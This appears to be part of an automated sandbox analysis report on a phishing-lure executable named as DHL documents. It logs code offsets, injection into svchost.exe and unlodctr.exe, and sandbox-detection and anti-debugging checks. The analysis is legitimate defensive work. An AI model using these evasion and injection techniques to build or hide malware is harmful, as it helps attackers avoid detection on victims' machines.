Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042E863 push edi; ret	1_2_0042E86F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004278F6 push esp; iretd	1_2_004278FD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411896 pushfd ; ret	1_2_004118A1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00429187 push edx; iretd	1_2_00429196
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00427193 pushad ; iretd	1_2_004271E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00412250 push eax; ret	1_2_00412391
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416AC7 push ebx; retf	1_2_00416ACA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004272FE pushad ; iretd	1_2_0042730D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004122FF push eax; ret	1_2_00412391
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00427303 pushad ; iretd	1_2_0042730D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00413320 push eax; ret	1_2_00413322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004123A1 push eax; ret	1_2_00412391
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00427401 push 147C1A69h; iretd	1_2_0042740E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041D4E5 push ds; ret	1_2_0041D4E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00428546 push esi; ret	1_2_00428556
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004185DF push ebp; retf	1_2_004185E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042F5B3 push edi; ret	1_2_0042F5BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00428E7C pushad ; retf	1_2_00428E8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300225F pushad ; ret	1_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030027FA pushad ; ret	1_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx	1_2_030309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300283D push eax; iretd	1_2_03002858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300135E push eax; iretd	1_2_03001369
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042EAC55 push esi; ret	3_2_042EAC65
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042DACEE push ebp; retf	3_2_042DACF6
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042F1CC2 push edi; ret	3_2_042F1CCD
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042EB58B pushad ; retf	3_2_042EB599
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042F0F64 push edi; ret	3_2_042F0F7E
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042F0F72 push edi; ret	3_2_042F0F7E

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001CF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_001CF98E
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00241C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00241C41

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-94687

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	API/Special instruction interceptor: Address: 118AB4C
Source: C:\Windows\SysWOW64\unlodctr.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\unlodctr.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\unlodctr.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\unlodctr.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\unlodctr.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\unlodctr.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\unlodctr.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\unlodctr.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0307096E rdtsc

1_2_0307096E

Source: C:\Windows\SysWOW64\unlodctr.exe

Window / User API: threadDelayed 9756

Jump to behavior

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	API coverage: 3.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\unlodctr.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\unlodctr.exe TID: 7904	Thread sleep count: 215 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 7904	Thread sleep time: -430000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 7904	Thread sleep count: 9756 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 7904	Thread sleep time: -19512000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe TID: 7928	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe TID: 7928	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe TID: 7928	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe TID: 7928	Thread sleep time: -39000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\unlodctr.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\unlodctr.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_002268EE FindFirstFileW,FindClose,	0_2_002268EE
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0022698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0022698F
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0021D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0021D076
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0021D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0021D3A9
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00229642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00229642
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0022979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0022979D
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00229B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00229B2B
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0021DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0021DBBE
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00225C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00225C97
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F9C640 FindFirstFileW,FindNextFileW,FindClose,	4_2_02F9C640

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_001B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001B42DE

Source: unlodctr.exe, 00000004.00000002.4112047770.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000002.4112887615.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000008.00000002.2225738159.000002483D13C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll??

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0307096E rdtsc

1_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00427983 LdrLoadDll,

1_2_00427983

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0022EAA2 BlockInput,

0_2_0022EAA2

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_001E2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_001E2622

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_001B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001B42DE

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D4CE8 mov eax, dword ptr fs:[00000030h]	0_2_001D4CE8
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0118ADB8 mov eax, dword ptr fs:[00000030h]	0_2_0118ADB8
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0118AE18 mov eax, dword ptr fs:[00000030h]	0_2_0118AE18
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_01189798 mov eax, dword ptr fs:[00000030h]	0_2_01189798
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h]	1_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h]	1_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]	1_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03108324 mov ecx, dword ptr fs:[00000030h]	1_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]	1_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]	1_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h]	1_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h]	1_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310634F mov eax, dword ptr fs:[00000030h]	1_2_0310634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D437C mov eax, dword ptr fs:[00000030h]	1_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]	1_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]	1_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h]	1_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h]	1_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]	1_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]	1_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030663FF mov eax, dword ptr fs:[00000030h]	1_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302823B mov eax, dword ptr fs:[00000030h]	1_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h]	1_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h]	1_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310625D mov eax, dword ptr fs:[00000030h]	1_2_0310625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h]	1_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]	1_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]	1_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]	1_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]	1_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]	1_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]	1_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]	1_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]	1_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031062D6 mov eax, dword ptr fs:[00000030h]	1_2_031062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
